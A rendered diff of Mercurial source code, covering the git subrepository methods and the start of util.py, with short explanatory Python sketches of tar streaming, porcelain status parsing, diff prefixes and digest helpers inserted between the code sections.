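    for branch, tip in branch2rev.items():
        if not branch.startswith('refs/remotes/origin/'):
            continue
        if tip == revision or isancestor(revision, tip):
            return False        # a remote branch already contains it
    return True                 # must push the checked-out branch

branches = {'refs/remotes/origin/master': 'feedc0de',
            'refs/heads/topic': 'cafebabe'}
print(needspush('feedc0de', branches, lambda a, b: False))   # -> False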
1741 @annotatesubrepoerror
1745 @annotatesubrepoerror
1742 def add(self, ui, match, prefix, explicitonly, **opts):
1746 def add(self, ui, match, prefix, explicitonly, **opts):
1743 if self._gitmissing():
1747 if self._gitmissing():
1744 return []
1748 return []
1745
1749
1746 (modified, added, removed,
1750 (modified, added, removed,
1747 deleted, unknown, ignored, clean) = self.status(None, unknown=True,
1751 deleted, unknown, ignored, clean) = self.status(None, unknown=True,
1748 clean=True)
1752 clean=True)
1749
1753
1750 tracked = set()
1754 tracked = set()
1751 # dirstate states 'a', 'm' and 'n' warn; 'r' is added again
1755 # dirstate states 'a', 'm' and 'n' warn; 'r' is added again
1752 for l in (modified, added, deleted, clean):
1756 for l in (modified, added, deleted, clean):
1753 tracked.update(l)
1757 tracked.update(l)
1754
1758
1755 # Unknown files not of interest will be rejected by the matcher
1759 # Unknown files not of interest will be rejected by the matcher
1756 files = unknown
1760 files = unknown
1757 files.extend(match.files())
1761 files.extend(match.files())
1758
1762
1759 rejected = []
1763 rejected = []
1760
1764
1761 files = [f for f in sorted(set(files)) if match(f)]
1765 files = [f for f in sorted(set(files)) if match(f)]
1762 for f in files:
1766 for f in files:
1763 exact = match.exact(f)
1767 exact = match.exact(f)
1764 command = ["add"]
1768 command = ["add"]
1765 if exact:
1769 if exact:
1766 command.append("-f") # should be added, even if ignored
1770 command.append("-f") # should be added, even if ignored
1767 if ui.verbose or not exact:
1771 if ui.verbose or not exact:
1768 ui.status(_('adding %s\n') % match.rel(f))
1772 ui.status(_('adding %s\n') % match.rel(f))
1769
1773
1770 if f in tracked: # hg prints 'adding' even if already tracked
1774 if f in tracked: # hg prints 'adding' even if already tracked
1771 if exact:
1775 if exact:
1772 rejected.append(f)
1776 rejected.append(f)
1773 continue
1777 continue
1774 if not opts.get('dry_run'):
1778 if not opts.get('dry_run'):
1775 self._gitcommand(command + [f])
1779 self._gitcommand(command + [f])
1776
1780
1777 for f in rejected:
1781 for f in rejected:
1778 ui.warn(_("%s already tracked!\n") % match.abs(f))
1782 ui.warn(_("%s already tracked!\n") % match.abs(f))
1779
1783
1780 return rejected
1784 return rejected
1781
1785
1782 @annotatesubrepoerror
1786 @annotatesubrepoerror
1783 def remove(self):
1787 def remove(self):
1784 if self._gitmissing():
1788 if self._gitmissing():
1785 return
1789 return
1786 if self.dirty():
1790 if self.dirty():
1787 self.ui.warn(_('not removing repo %s because '
1791 self.ui.warn(_('not removing repo %s because '
1788 'it has changes.\n') % self._relpath)
1792 'it has changes.\n') % self._relpath)
1789 return
1793 return
1790 # we can't fully delete the repository as it may contain
1794 # we can't fully delete the repository as it may contain
1791 # local-only history
1795 # local-only history
1792 self.ui.note(_('removing subrepo %s\n') % self._relpath)
1796 self.ui.note(_('removing subrepo %s\n') % self._relpath)
1793 self._gitcommand(['config', 'core.bare', 'true'])
1797 self._gitcommand(['config', 'core.bare', 'true'])
1794 for f, kind in self.wvfs.readdir():
1798 for f, kind in self.wvfs.readdir():
1795 if f == '.git':
1799 if f == '.git':
1796 continue
1800 continue
1797 if kind == stat.S_IFDIR:
1801 if kind == stat.S_IFDIR:
1798 self.wvfs.rmtree(f)
1802 self.wvfs.rmtree(f)
1799 else:
1803 else:
1800 self.wvfs.unlink(f)
1804 self.wvfs.unlink(f)
1801
1805
1802 def archive(self, archiver, prefix, match=None, decode=True):
1806 def archive(self, archiver, prefix, match=None, decode=True):
1803 total = 0
1807 total = 0
1804 source, revision = self._state
1808 source, revision = self._state
1805 if not revision:
1809 if not revision:
1806 return total
1810 return total
1807 self._fetch(source, revision)
1811 self._fetch(source, revision)
1808
1812
1809 # Parse the output of git's native archive command.
1813 # Parse the output of git's native archive command.
1810 # This should be much faster than manually traversing the trees
1814 # This should be much faster than manually traversing the trees
1811 # and objects with many subprocess calls.
1815 # and objects with many subprocess calls.
1812 tarstream = self._gitcommand(['archive', revision], stream=True)
1816 tarstream = self._gitcommand(['archive', revision], stream=True)
1813 tar = tarfile.open(fileobj=tarstream, mode='r|')
1817 tar = tarfile.open(fileobj=tarstream, mode='r|')
1814 relpath = subrelpath(self)
1818 relpath = subrelpath(self)
1815 self.ui.progress(_('archiving (%s)') % relpath, 0, unit=_('files'))
1819 self.ui.progress(_('archiving (%s)') % relpath, 0, unit=_('files'))
1816 for i, info in enumerate(tar):
1820 for i, info in enumerate(tar):
1817 if info.isdir():
1821 if info.isdir():
1818 continue
1822 continue
1819 if match and not match(info.name):
1823 if match and not match(info.name):
1820 continue
1824 continue
1821 if info.issym():
1825 if info.issym():
1822 data = info.linkname
1826 data = info.linkname
1823 else:
1827 else:
1824 data = tar.extractfile(info).read()
1828 data = tar.extractfile(info).read()
1825 archiver.addfile(prefix + self._path + '/' + info.name,
1829 archiver.addfile(prefix + self._path + '/' + info.name,
1826 info.mode, info.issym(), data)
1830 info.mode, info.issym(), data)
1827 total += 1
1831 total += 1
1828 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
1832 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
1829 unit=_('files'))
1833 unit=_('files'))
1830 self.ui.progress(_('archiving (%s)') % relpath, None)
1834 self.ui.progress(_('archiving (%s)') % relpath, None)
1831 return total
1835 return total
1832
1836
1833
1837
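# Stand-alone sketch of the streaming-tar consumption above.  A tar built in
# memory stands in for the 'git archive' pipe; mode='r|' is the important
# part - it reads strictly sequentially, so a non-seekable subprocess stream
# works as input.
import io, tarfile

buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode='w') as tf:
    payload = b'hello subrepo\n'
    info = tarfile.TarInfo('greeting.txt')
    info.size = len(payload)
    tf.addfile(info, io.BytesIO(payload))
buf.seek(0)

stream = tarfile.open(fileobj=buf, mode='r|')   # sequential, no seeking
for member in stream:
    if member.isdir():
        continue
    print(member.name, stream.extractfile(member).read())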
1834 @annotatesubrepoerror
1838 @annotatesubrepoerror
1835 def cat(self, match, prefix, **opts):
1839 def cat(self, match, prefix, **opts):
1836 rev = self._state[1]
1840 rev = self._state[1]
1837 if match.anypats():
1841 if match.anypats():
1838 return 1 # no support for include/exclude yet
1842 return 1 # no support for include/exclude yet
1839
1843
1840 if not match.files():
1844 if not match.files():
1841 return 1
1845 return 1
1842
1846
1843 for f in match.files():
1847 for f in match.files():
1844 output = self._gitcommand(["show", "%s:%s" % (rev, f)])
1848 output = self._gitcommand(["show", "%s:%s" % (rev, f)])
1845 fp = cmdutil.makefileobj(self._subparent, opts.get('output'),
1849 fp = cmdutil.makefileobj(self._subparent, opts.get('output'),
1846 self._ctx.node(),
1850 self._ctx.node(),
1847 pathname=self.wvfs.reljoin(prefix, f))
1851 pathname=self.wvfs.reljoin(prefix, f))
1848 fp.write(output)
1852 fp.write(output)
1849 fp.close()
1853 fp.close()
1850 return 0
1854 return 0
1851
1855
1852
1856
1853 @annotatesubrepoerror
1857 @annotatesubrepoerror
1854 def status(self, rev2, **opts):
1858 def status(self, rev2, **opts):
1855 rev1 = self._state[1]
1859 rev1 = self._state[1]
1856 if self._gitmissing() or not rev1:
1860 if self._gitmissing() or not rev1:
1857 # if the repo is missing, return no results
1861 # if the repo is missing, return no results
1858 return scmutil.status([], [], [], [], [], [], [])
1862 return scmutil.status([], [], [], [], [], [], [])
1859 modified, added, removed = [], [], []
1863 modified, added, removed = [], [], []
1860 self._gitupdatestat()
1864 self._gitupdatestat()
1861 if rev2:
1865 if rev2:
1862 command = ['diff-tree', '--no-renames', '-r', rev1, rev2]
1866 command = ['diff-tree', '--no-renames', '-r', rev1, rev2]
1863 else:
1867 else:
1864 command = ['diff-index', '--no-renames', rev1]
1868 command = ['diff-index', '--no-renames', rev1]
1865 out = self._gitcommand(command)
1869 out = self._gitcommand(command)
1866 for line in out.split('\n'):
1870 for line in out.split('\n'):
1867 tab = line.find('\t')
1871 tab = line.find('\t')
1868 if tab == -1:
1872 if tab == -1:
1869 continue
1873 continue
1870 status, f = line[tab - 1], line[tab + 1:]
1874 status, f = line[tab - 1], line[tab + 1:]
1871 if status == 'M':
1875 if status == 'M':
1872 modified.append(f)
1876 modified.append(f)
1873 elif status == 'A':
1877 elif status == 'A':
1874 added.append(f)
1878 added.append(f)
1875 elif status == 'D':
1879 elif status == 'D':
1876 removed.append(f)
1880 removed.append(f)
1877
1881
1878 deleted, unknown, ignored, clean = [], [], [], []
1882 deleted, unknown, ignored, clean = [], [], [], []
1879
1883
1880 command = ['status', '--porcelain', '-z']
1884 command = ['status', '--porcelain', '-z']
1881 if opts.get('unknown'):
1885 if opts.get('unknown'):
1882 command += ['--untracked-files=all']
1886 command += ['--untracked-files=all']
1883 if opts.get('ignored'):
1887 if opts.get('ignored'):
1884 command += ['--ignored']
1888 command += ['--ignored']
1885 out = self._gitcommand(command)
1889 out = self._gitcommand(command)
1886
1890
1887 changedfiles = set()
1891 changedfiles = set()
1888 changedfiles.update(modified)
1892 changedfiles.update(modified)
1889 changedfiles.update(added)
1893 changedfiles.update(added)
1890 changedfiles.update(removed)
1894 changedfiles.update(removed)
1891 for line in out.split('\0'):
1895 for line in out.split('\0'):
1892 if not line:
1896 if not line:
1893 continue
1897 continue
1894 st = line[0:2]
1898 st = line[0:2]
1895 # moves and copies show two files on one line
1899 # moves and copies show two files on one line
1896 if line.find('\0') >= 0:
1900 if line.find('\0') >= 0:
1897 filename1, filename2 = line[3:].split('\0')
1901 filename1, filename2 = line[3:].split('\0')
1898 else:
1902 else:
1899 filename1 = line[3:]
1903 filename1 = line[3:]
1900 filename2 = None
1904 filename2 = None
1901
1905
1902 changedfiles.add(filename1)
1906 changedfiles.add(filename1)
1903 if filename2:
1907 if filename2:
1904 changedfiles.add(filename2)
1908 changedfiles.add(filename2)
1905
1909
1906 if st == '??':
1910 if st == '??':
1907 unknown.append(filename1)
1911 unknown.append(filename1)
1908 elif st == '!!':
1912 elif st == '!!':
1909 ignored.append(filename1)
1913 ignored.append(filename1)
1910
1914
1911 if opts.get('clean'):
1915 if opts.get('clean'):
1912 out = self._gitcommand(['ls-files'])
1916 out = self._gitcommand(['ls-files'])
1913 for f in out.split('\n'):
1917 for f in out.split('\n'):
1914 if f not in changedfiles:
1918 if f not in changedfiles:
1915 clean.append(f)
1919 clean.append(f)
1916
1920
1917 return scmutil.status(modified, added, removed, deleted,
1921 return scmutil.status(modified, added, removed, deleted,
1918 unknown, ignored, clean)
1922 unknown, ignored, clean)
1919
1923
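# Note on the porcelain loop above: after out.split('\0') no element can
# itself contain a NUL, so the line.find('\0') branch never fires and a
# rename's second name arrives as a separate field.  A stand-alone parser
# that pairs those fields explicitly might look like this (sketch, not hg
# code):

def parseporcelain(out):
    entries, fields, i = [], out.split('\0'), 0
    while i < len(fields) and fields[i]:
        st, name = fields[i][:2], fields[i][3:]
        old = None
        if st[0] in 'RC':       # rename/copy: next field is the source name
            i += 1
            old = fields[i]
        entries.append((st, name, old))
        i += 1
    return entries

sample = 'M  a.txt\x00R  new.txt\x00old.txt\x00?? junk\x00'
print(parseporcelain(sample))
# [('M ', 'a.txt', None), ('R ', 'new.txt', 'old.txt'), ('??', 'junk', None)]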
1920 @annotatesubrepoerror
1924 @annotatesubrepoerror
1921 def diff(self, ui, diffopts, node2, match, prefix, **opts):
1925 def diff(self, ui, diffopts, node2, match, prefix, **opts):
1922 node1 = self._state[1]
1926 node1 = self._state[1]
1923 cmd = ['diff', '--no-renames']
1927 cmd = ['diff', '--no-renames']
1924 if opts['stat']:
1928 if opts['stat']:
1925 cmd.append('--stat')
1929 cmd.append('--stat')
1926 else:
1930 else:
1927 # for Git, this also implies '-p'
1931 # for Git, this also implies '-p'
1928 cmd.append('-U%d' % diffopts.context)
1932 cmd.append('-U%d' % diffopts.context)
1929
1933
1930 gitprefix = self.wvfs.reljoin(prefix, self._path)
1934 gitprefix = self.wvfs.reljoin(prefix, self._path)
1931
1935
1932 if diffopts.noprefix:
1936 if diffopts.noprefix:
1933 cmd.extend(['--src-prefix=%s/' % gitprefix,
1937 cmd.extend(['--src-prefix=%s/' % gitprefix,
1934 '--dst-prefix=%s/' % gitprefix])
1938 '--dst-prefix=%s/' % gitprefix])
1935 else:
1939 else:
1936 cmd.extend(['--src-prefix=a/%s/' % gitprefix,
1940 cmd.extend(['--src-prefix=a/%s/' % gitprefix,
1937 '--dst-prefix=b/%s/' % gitprefix])
1941 '--dst-prefix=b/%s/' % gitprefix])
1938
1942
1939 if diffopts.ignorews:
1943 if diffopts.ignorews:
1940 cmd.append('--ignore-all-space')
1944 cmd.append('--ignore-all-space')
1941 if diffopts.ignorewsamount:
1945 if diffopts.ignorewsamount:
1942 cmd.append('--ignore-space-change')
1946 cmd.append('--ignore-space-change')
1943 if self._gitversion(self._gitcommand(['--version'])) >= (1, 8, 4) \
1947 if self._gitversion(self._gitcommand(['--version'])) >= (1, 8, 4) \
1944 and diffopts.ignoreblanklines:
1948 and diffopts.ignoreblanklines:
1945 cmd.append('--ignore-blank-lines')
1949 cmd.append('--ignore-blank-lines')
1946
1950
1947 cmd.append(node1)
1951 cmd.append(node1)
1948 if node2:
1952 if node2:
1949 cmd.append(node2)
1953 cmd.append(node2)
1950
1954
1951 output = ""
1955 output = ""
1952 if match.always():
1956 if match.always():
1953 output += self._gitcommand(cmd) + '\n'
1957 output += self._gitcommand(cmd) + '\n'
1954 else:
1958 else:
1955 st = self.status(node2)[:3]
1959 st = self.status(node2)[:3]
1956 files = [f for sublist in st for f in sublist]
1960 files = [f for sublist in st for f in sublist]
1957 for f in files:
1961 for f in files:
1958 if match(f):
1962 if match(f):
1959 output += self._gitcommand(cmd + ['--', f]) + '\n'
1963 output += self._gitcommand(cmd + ['--', f]) + '\n'
1960
1964
1961 if output.strip():
1965 if output.strip():
1962 ui.write(output)
1966 ui.write(output)
1963
1967
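# Sketch of the prefix handling above: git's default a/ and b/ path prefixes
# are rewritten so hunks name files relative to the parent repository.
# 'sub/repo' is a made-up subrepo path for illustration.

def diffprefixargs(gitprefix, noprefix=False):
    if noprefix:
        return ['--src-prefix=%s/' % gitprefix,
                '--dst-prefix=%s/' % gitprefix]
    return ['--src-prefix=a/%s/' % gitprefix,
            '--dst-prefix=b/%s/' % gitprefix]

print(diffprefixargs('sub/repo'))
# ['--src-prefix=a/sub/repo/', '--dst-prefix=b/sub/repo/']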
1964 @annotatesubrepoerror
1968 @annotatesubrepoerror
1965 def revert(self, substate, *pats, **opts):
1969 def revert(self, substate, *pats, **opts):
1966 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1970 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1967 if not opts.get('no_backup'):
1971 if not opts.get('no_backup'):
1968 status = self.status(None)
1972 status = self.status(None)
1969 names = status.modified
1973 names = status.modified
1970 for name in names:
1974 for name in names:
1971 bakname = scmutil.origpath(self.ui, self._subparent, name)
1975 bakname = scmutil.origpath(self.ui, self._subparent, name)
1972 self.ui.note(_('saving current version of %s as %s\n') %
1976 self.ui.note(_('saving current version of %s as %s\n') %
1973 (name, bakname))
1977 (name, bakname))
1974 self.wvfs.rename(name, bakname)
1978 self.wvfs.rename(name, bakname)
1975
1979
1976 if not opts.get('dry_run'):
1980 if not opts.get('dry_run'):
1977 self.get(substate, overwrite=True)
1981 self.get(substate, overwrite=True)
1978 return []
1982 return []
1979
1983
1980 def shortid(self, revid):
1984 def shortid(self, revid):
1981 return revid[:7]
1985 return revid[:7]
1982
1986
1983 types = {
1987 types = {
1984 'hg': hgsubrepo,
1988 'hg': hgsubrepo,
1985 'svn': svnsubrepo,
1989 'svn': svnsubrepo,
1986 'git': gitsubrepo,
1990 'git': gitsubrepo,
1987 }
1991 }
@@ -1,3764 +1,3765 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import
16 from __future__ import absolute_import
17
17
18 import bz2
18 import bz2
19 import calendar
19 import calendar
20 import codecs
20 import codecs
21 import collections
21 import collections
22 import datetime
22 import datetime
23 import errno
23 import errno
24 import gc
24 import gc
25 import hashlib
25 import hashlib
26 import imp
26 import imp
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import signal
31 import signal
32 import socket
32 import socket
33 import stat
33 import stat
34 import string
34 import string
35 import subprocess
35 import subprocess
36 import sys
36 import sys
37 import tempfile
37 import tempfile
38 import textwrap
38 import textwrap
39 import time
39 import time
40 import traceback
40 import traceback
41 import warnings
41 import warnings
42 import zlib
42 import zlib
43
43
44 from . import (
44 from . import (
45 encoding,
45 encoding,
46 error,
46 error,
47 i18n,
47 i18n,
48 osutil,
48 osutil,
49 parsers,
49 parsers,
50 pycompat,
50 pycompat,
51 )
51 )
52
52
53 cookielib = pycompat.cookielib
53 cookielib = pycompat.cookielib
54 empty = pycompat.empty
54 empty = pycompat.empty
55 httplib = pycompat.httplib
55 httplib = pycompat.httplib
56 httpserver = pycompat.httpserver
56 httpserver = pycompat.httpserver
57 pickle = pycompat.pickle
57 pickle = pycompat.pickle
58 queue = pycompat.queue
58 queue = pycompat.queue
59 socketserver = pycompat.socketserver
59 socketserver = pycompat.socketserver
60 stderr = pycompat.stderr
60 stderr = pycompat.stderr
61 stdin = pycompat.stdin
61 stdin = pycompat.stdin
62 stdout = pycompat.stdout
62 stdout = pycompat.stdout
63 stringio = pycompat.stringio
63 stringio = pycompat.stringio
64 urlerr = pycompat.urlerr
64 urlerr = pycompat.urlerr
65 urlreq = pycompat.urlreq
65 urlreq = pycompat.urlreq
66 xmlrpclib = pycompat.xmlrpclib
66 xmlrpclib = pycompat.xmlrpclib
67
67
68 # workaround for win32mbcs
68 # workaround for win32mbcs
69 _filenamebytestr = pycompat.bytestr
69 _filenamebytestr = pycompat.bytestr
70
70
71 def isatty(fp):
71 def isatty(fp):
72 try:
72 try:
73 return fp.isatty()
73 return fp.isatty()
74 except AttributeError:
74 except AttributeError:
75 return False
75 return False
76
76
77 # glibc determines buffering on the first write to stdout - if we replace a
77 # glibc determines buffering on the first write to stdout - if we replace a
78 # TTY-destined stdout with a pipe-destined stdout (e.g. a pager), we want
78 # TTY-destined stdout with a pipe-destined stdout (e.g. a pager), we want
79 # line buffering
79 # line buffering
80 if isatty(stdout):
80 if isatty(stdout):
81 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
81 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
82
82
83 if pycompat.osname == 'nt':
83 if pycompat.osname == 'nt':
84 from . import windows as platform
84 from . import windows as platform
85 stdout = platform.winstdout(stdout)
85 stdout = platform.winstdout(stdout)
86 else:
86 else:
87 from . import posix as platform
87 from . import posix as platform
88
88
89 _ = i18n._
89 _ = i18n._
90
90
91 bindunixsocket = platform.bindunixsocket
91 bindunixsocket = platform.bindunixsocket
92 cachestat = platform.cachestat
92 cachestat = platform.cachestat
93 checkexec = platform.checkexec
93 checkexec = platform.checkexec
94 checklink = platform.checklink
94 checklink = platform.checklink
95 copymode = platform.copymode
95 copymode = platform.copymode
96 executablepath = platform.executablepath
96 executablepath = platform.executablepath
97 expandglobs = platform.expandglobs
97 expandglobs = platform.expandglobs
98 explainexit = platform.explainexit
98 explainexit = platform.explainexit
99 findexe = platform.findexe
99 findexe = platform.findexe
100 gethgcmd = platform.gethgcmd
100 gethgcmd = platform.gethgcmd
101 getuser = platform.getuser
101 getuser = platform.getuser
102 getpid = os.getpid
102 getpid = os.getpid
103 groupmembers = platform.groupmembers
103 groupmembers = platform.groupmembers
104 groupname = platform.groupname
104 groupname = platform.groupname
105 hidewindow = platform.hidewindow
105 hidewindow = platform.hidewindow
106 isexec = platform.isexec
106 isexec = platform.isexec
107 isowner = platform.isowner
107 isowner = platform.isowner
108 localpath = platform.localpath
108 localpath = platform.localpath
109 lookupreg = platform.lookupreg
109 lookupreg = platform.lookupreg
110 makedir = platform.makedir
110 makedir = platform.makedir
111 nlinks = platform.nlinks
111 nlinks = platform.nlinks
112 normpath = platform.normpath
112 normpath = platform.normpath
113 normcase = platform.normcase
113 normcase = platform.normcase
114 normcasespec = platform.normcasespec
114 normcasespec = platform.normcasespec
115 normcasefallback = platform.normcasefallback
115 normcasefallback = platform.normcasefallback
116 openhardlinks = platform.openhardlinks
116 openhardlinks = platform.openhardlinks
117 oslink = platform.oslink
117 oslink = platform.oslink
118 parsepatchoutput = platform.parsepatchoutput
118 parsepatchoutput = platform.parsepatchoutput
119 pconvert = platform.pconvert
119 pconvert = platform.pconvert
120 poll = platform.poll
120 poll = platform.poll
121 popen = platform.popen
121 popen = platform.popen
122 posixfile = platform.posixfile
122 posixfile = platform.posixfile
123 quotecommand = platform.quotecommand
123 quotecommand = platform.quotecommand
124 readpipe = platform.readpipe
124 readpipe = platform.readpipe
125 rename = platform.rename
125 rename = platform.rename
126 removedirs = platform.removedirs
126 removedirs = platform.removedirs
127 samedevice = platform.samedevice
127 samedevice = platform.samedevice
128 samefile = platform.samefile
128 samefile = platform.samefile
129 samestat = platform.samestat
129 samestat = platform.samestat
130 setbinary = platform.setbinary
130 setbinary = platform.setbinary
131 setflags = platform.setflags
131 setflags = platform.setflags
132 setsignalhandler = platform.setsignalhandler
132 setsignalhandler = platform.setsignalhandler
133 shellquote = platform.shellquote
133 shellquote = platform.shellquote
134 spawndetached = platform.spawndetached
134 spawndetached = platform.spawndetached
135 split = platform.split
135 split = platform.split
136 sshargs = platform.sshargs
136 sshargs = platform.sshargs
137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
137 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
138 statisexec = platform.statisexec
138 statisexec = platform.statisexec
139 statislink = platform.statislink
139 statislink = platform.statislink
140 testpid = platform.testpid
140 testpid = platform.testpid
141 umask = platform.umask
141 umask = platform.umask
142 unlink = platform.unlink
142 unlink = platform.unlink
143 username = platform.username
143 username = platform.username
144
144
145 # Python compatibility
145 # Python compatibility
146
146
147 _notset = object()
147 _notset = object()
148
148
149 # disable Python's problematic floating point timestamps (issue4836)
149 # disable Python's problematic floating point timestamps (issue4836)
150 # (Python hypocritically says you shouldn't change this behavior in
150 # (Python hypocritically says you shouldn't change this behavior in
151 # libraries, and sure enough Mercurial is not a library.)
151 # libraries, and sure enough Mercurial is not a library.)
152 os.stat_float_times(False)
152 os.stat_float_times(False)
153
153
154 def safehasattr(thing, attr):
154 def safehasattr(thing, attr):
155 return getattr(thing, attr, _notset) is not _notset
155 return getattr(thing, attr, _notset) is not _notset
156
156
157 def bitsfrom(container):
157 def bitsfrom(container):
158 bits = 0
158 bits = 0
159 for bit in container:
159 for bit in container:
160 bits |= bit
160 bits |= bit
161 return bits
161 return bits
162
162
163 # Python 2.6 still has deprecation warnings enabled by default. We do not
163 # Python 2.6 still has deprecation warnings enabled by default. We do not
164 # want to display anything to the standard user, so detect if we are running
164 # want to display anything to the standard user, so detect if we are running
165 # tests and only enable Python deprecation warnings in that case.
165 # tests and only enable Python deprecation warnings in that case.
166 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
166 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
167 if _dowarn:
167 if _dowarn:
168 # explicitly unfilter our warning for python 2.7
168 # explicitly unfilter our warning for python 2.7
169 #
169 #
170 # The option of setting PYTHONWARNINGS in the test runner was investigated.
170 # The option of setting PYTHONWARNINGS in the test runner was investigated.
171 # However, module name set through PYTHONWARNINGS was exactly matched, so
171 # However, module name set through PYTHONWARNINGS was exactly matched, so
172 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
172 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
173 # makes the whole PYTHONWARNINGS thing useless for our usecase.
173 # makes the whole PYTHONWARNINGS thing useless for our usecase.
174 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
174 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
175 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
175 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
176 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
176 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
177
177
178 def nouideprecwarn(msg, version, stacklevel=1):
178 def nouideprecwarn(msg, version, stacklevel=1):
179 """Issue an python native deprecation warning
179 """Issue an python native deprecation warning
180
180
181 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
181 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
182 """
182 """
183 if _dowarn:
183 if _dowarn:
184 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
184 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
185 " update your code.)") % version
185 " update your code.)") % version
186 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
186 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
187
187
188 DIGESTS = {
188 DIGESTS = {
189 'md5': hashlib.md5,
189 'md5': hashlib.md5,
190 'sha1': hashlib.sha1,
190 'sha1': hashlib.sha1,
191 'sha512': hashlib.sha512,
191 'sha512': hashlib.sha512,
192 }
192 }
193 # List of digest types from strongest to weakest
193 # List of digest types from strongest to weakest
194 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
194 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
195
195
196 for k in DIGESTS_BY_STRENGTH:
196 for k in DIGESTS_BY_STRENGTH:
197 assert k in DIGESTS
197 assert k in DIGESTS
198
198
199 class digester(object):
199 class digester(object):
200 """helper to compute digests.
200 """helper to compute digests.
201
201
202 This helper can be used to compute one or more digests given their name.
202 This helper can be used to compute one or more digests given their name.
203
203
204 >>> d = digester(['md5', 'sha1'])
204 >>> d = digester(['md5', 'sha1'])
205 >>> d.update('foo')
205 >>> d.update('foo')
206 >>> [k for k in sorted(d)]
206 >>> [k for k in sorted(d)]
207 ['md5', 'sha1']
207 ['md5', 'sha1']
208 >>> d['md5']
208 >>> d['md5']
209 'acbd18db4cc2f85cedef654fccc4a4d8'
209 'acbd18db4cc2f85cedef654fccc4a4d8'
210 >>> d['sha1']
210 >>> d['sha1']
211 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
211 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
212 >>> digester.preferred(['md5', 'sha1'])
212 >>> digester.preferred(['md5', 'sha1'])
213 'sha1'
213 'sha1'
214 """
214 """
215
215
216 def __init__(self, digests, s=''):
216 def __init__(self, digests, s=''):
217 self._hashes = {}
217 self._hashes = {}
218 for k in digests:
218 for k in digests:
219 if k not in DIGESTS:
219 if k not in DIGESTS:
220 raise Abort(_('unknown digest type: %s') % k)
220 raise Abort(_('unknown digest type: %s') % k)
221 self._hashes[k] = DIGESTS[k]()
221 self._hashes[k] = DIGESTS[k]()
222 if s:
222 if s:
223 self.update(s)
223 self.update(s)
224
224
225 def update(self, data):
225 def update(self, data):
226 for h in self._hashes.values():
226 for h in self._hashes.values():
227 h.update(data)
227 h.update(data)
228
228
229 def __getitem__(self, key):
229 def __getitem__(self, key):
230 if key not in DIGESTS:
230 if key not in DIGESTS:
231 raise Abort(_('unknown digest type: %s') % key)
231 raise Abort(_('unknown digest type: %s') % key)
232 return self._hashes[key].hexdigest()
232 return self._hashes[key].hexdigest()
233
233
234 def __iter__(self):
234 def __iter__(self):
235 return iter(self._hashes)
235 return iter(self._hashes)
236
236
237 @staticmethod
237 @staticmethod
238 def preferred(supported):
238 def preferred(supported):
239 """returns the strongest digest type in both supported and DIGESTS."""
239 """returns the strongest digest type in both supported and DIGESTS."""
240
240
241 for k in DIGESTS_BY_STRENGTH:
241 for k in DIGESTS_BY_STRENGTH:
242 if k in supported:
242 if k in supported:
243 return k
243 return k
244 return None
244 return None
245
245
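# Usage sketch for digester: feed chunks once, then read any of the
# requested digests, and let preferred() pick the strongest both sides
# support.  Values match the doctest in the class docstring above.

d = digester(['md5', 'sha1'])
for chunk in (b'fo', b'o'):
    d.update(chunk)
print(d['sha1'])                            # 0beec7b5...5da8a33
print(digester.preferred(['md5', 'sha1']))  # 'sha1'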
246 class digestchecker(object):
246 class digestchecker(object):
247 """file handle wrapper that additionally checks content against a given
247 """file handle wrapper that additionally checks content against a given
248 size and digests.
248 size and digests.
249
249
250 d = digestchecker(fh, size, {'md5': '...'})
250 d = digestchecker(fh, size, {'md5': '...'})
251
251
252 When multiple digests are given, all of them are validated.
252 When multiple digests are given, all of them are validated.
253 """
253 """
254
254
255 def __init__(self, fh, size, digests):
255 def __init__(self, fh, size, digests):
256 self._fh = fh
256 self._fh = fh
257 self._size = size
